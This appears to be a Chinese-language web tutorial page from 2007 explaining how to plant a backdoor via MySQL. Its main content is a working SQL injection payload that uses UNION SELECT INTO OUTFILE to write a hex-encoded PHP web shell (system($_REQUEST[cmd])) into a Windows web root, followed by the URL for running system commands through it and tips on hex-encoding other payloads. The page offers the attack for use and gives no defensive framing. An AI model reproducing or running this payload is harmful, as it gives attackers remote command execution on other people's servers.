文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 国产软件 | 国外软件 | 汉化补丁 | 设为首页 | 加入收藏
业界资讯 | 图形图像 | 操作系统 | 网络冲浪 | 工具软件 | 办公软件 | 媒体动画 | 精文荟萃 | 认证考试 | 网站建设 | 技术开发 | 专栏
当前位置:abcdown网络学院网络编程MYSQL运用Mysql语句生成后门木马的具体方法
精品广告
推荐TOP10
·MySQL中的mysqldump命令使用详解
·MySQL数据库简介
·安全的配置和应用MySQL数据库
·修改MySQL的默认密码
·初学MYSQL应知道:Mysql参数优化
·数据库安全应用 使用MySQL的23个注意事项
·入门:MYSQL基础
·轻松描述Windows上安装多个Mysql的步骤
·安装与卸载MySQL数据库系统服务的常见问题
·Mysql 安全注意事项
阅读TOP10
·Sql Server中Image类型字段在VB.NET中的读写操作
·MySQL中的mysqldump命令使用详解
·怎样在vb.net中将图片存入SQL Server 2000并能读出来使用?
·SQL Server 2005性能测试实践-CPU篇 编译与重编译
·关于Sql server数据库日志满的快速解决办法
·如何将Access和Excel导入到Mysql中之三
·Zend Studio的client与server连接不上的解决
·Mysql数据库的操作类(已封装)
·Mysql日期和时间函数不求人
·如何将Access和Excel导入到Mysql中之一

运用Mysql语句生成后门木马的具体方法

日期:2007年8月3日 作者: 查看:[大字体 中字体 小字体]


通过Mysql 的语句生成后门木马的方法:

SELECT * FROM `vbb_strikes` WHERE 1 union select
2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

答:就是下图代码中的十六进制编码,

<?php system($_REQUEST[cmd]);?>

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!



上一篇:轻松描述Windows上安装多个Mysql的步骤

下一篇:Visual C++视频教程:第七课 7A-1


相关软件: 相关文章:
·史上最强全功能Win98精简版 39MB 能够在U盘运行的win98
·真正能在光盘上直接运行的XP
·董运昌《第33个街角转弯》320KB 推荐!吉他碟!
·运镖天下之四大镖局
·红太阳是怎样升起的:延安整风运动的来龙去脉
·精美超人气!Q版奥运金牌榜
·在光盘上运行的 win98
·以管理员身份运行“计算机管理”程序
·禁止运行组策略的解决方法
·运用C#制作屏幕捕捉程序
·口袋里的Linux:在您的U盘上运行SLAX
·在Windows XP中运行DOS程序
·如何隐藏程序的运行
·让Pqmagic在Server版中运行

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.abcdown.net
首页 | 本站声明 | 下载帮助 | 发布软件 |
中文版权所有:ABC学院 浙ICP备05000717号